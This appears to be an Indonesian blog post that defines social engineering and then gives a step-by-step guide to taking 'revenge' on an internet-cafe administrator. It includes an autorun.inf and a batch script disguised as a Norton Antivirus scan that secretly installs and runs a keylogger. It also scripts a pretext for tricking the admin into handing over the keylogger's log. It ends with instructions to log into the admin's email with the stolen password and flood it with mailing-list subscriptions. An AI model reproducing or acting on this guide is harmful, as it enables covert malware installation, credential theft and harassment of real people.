Social Engineering
adalah nama suatu tehnik pengumpulan informasi dengan memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai “penipuan” Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran seperti sang korban. Social Engineering merupakan seni
“memaksa” orang lain untuk melakukan sesuatu sesuai dengan harapan atau keinginan anda. Tentu saja “pemaksaan” yang dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang biasa dilakukan sang korban.
Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan, dan memiliki kata-kata atau penampilan yang meyakinkan.
Hal ini sering dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan kepadanya.Ya,tanpa kita sadari dia
mengkondisikan kita dalam suatu masalah dan membuat ( seolah – olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan demikian , tentu kita akan cenderung untuk menuruti apa yang dia instruksikan tanpa merasa curiga.
Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai karena bisa berakibat fatal bagi sistem anda. Karena bagaimanapun juga suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu sistem komputerpun di muka bumi ini yang
bisa lepas dari campur tangan manusia. ehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker melalui social engineering, maka bisa jadi anda sendirilah yang membukakan jalan masuk bagi sang attacker.
Contoh :
Social Engineering sederhana : Pembalasan Sang Admin.
Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan) disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala keterbatasan itu dan saling men-share pengetahuan mereka. Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang 100% secure.
A. Serangan Pertama
Kita akan menjadi seorang “agen mata-mata” (hehehe.. gw pake istilah ini biar ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin. Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan orang… mendapatkan password sang admin., ikuti langkah – langkah berikut:
1-Bukalah Notepad kemudian ketik baris script berikut:
[autorun] open=nav.bat
Klik
[file][save] kemudian pada box save as type, pilih All Files dan pada form isian nama beri nama Autorun.inf lalu klik tombol [save].
2-Buka lembar baru pada notepad dengan klik menu [file] [new] lalu ketik script berikut:
@echo off echo Norton Antivirus 2006 echo Scanning disk drive…echo Please wait…copy navw32.exe %windir%navw32.exe call %windir%navw32.exe echo.echo. echo.echo.echo. echo.echo. echo. Scanning complette! No virus threat detected!echo. cls
B. Serangan Kedua
Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkahlakulah secara wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan :) katakan pada beliau,”Mas/mbak/om/tante/, komputer saya bermasalah neeh. Menurut pesan Error yang muncul, file navw32.dll yang berada di directory windows hilang. File tersebut beratribut hidden. Tolong dong copykan dari komputer ini. Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu.
Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All files pada Folder Options dan mengcopy-kan file navw32.dll dari directory windows tanpa menyadari bahwa file tersebut bukan file system, tapi file hasil rekaman keyloger. Berikan disket/cd/flashdisk dan setelah file tersebut tersimpan, ucapkan beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik 2x pada file lalu ketika muncul kotak dialog open with, klik opsi select program from a list dan pilih notepad pada daftar program yang ditampilkan. Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari password emailnya dan kamu bisa menuju pada hari pembalasan.
C. Hari Pembalasan
Pilih hari yang tepat, misalnya malam jum’at kliwon dimana sang admin mungkin
sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet.
Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah warnet yang buka 24 jam. Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin. Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar dengan email tersebut. Subscribe sebanyak-banyaknya.
Referensi : ID-SIRTII
Tidak ada komentar:
Posting Komentar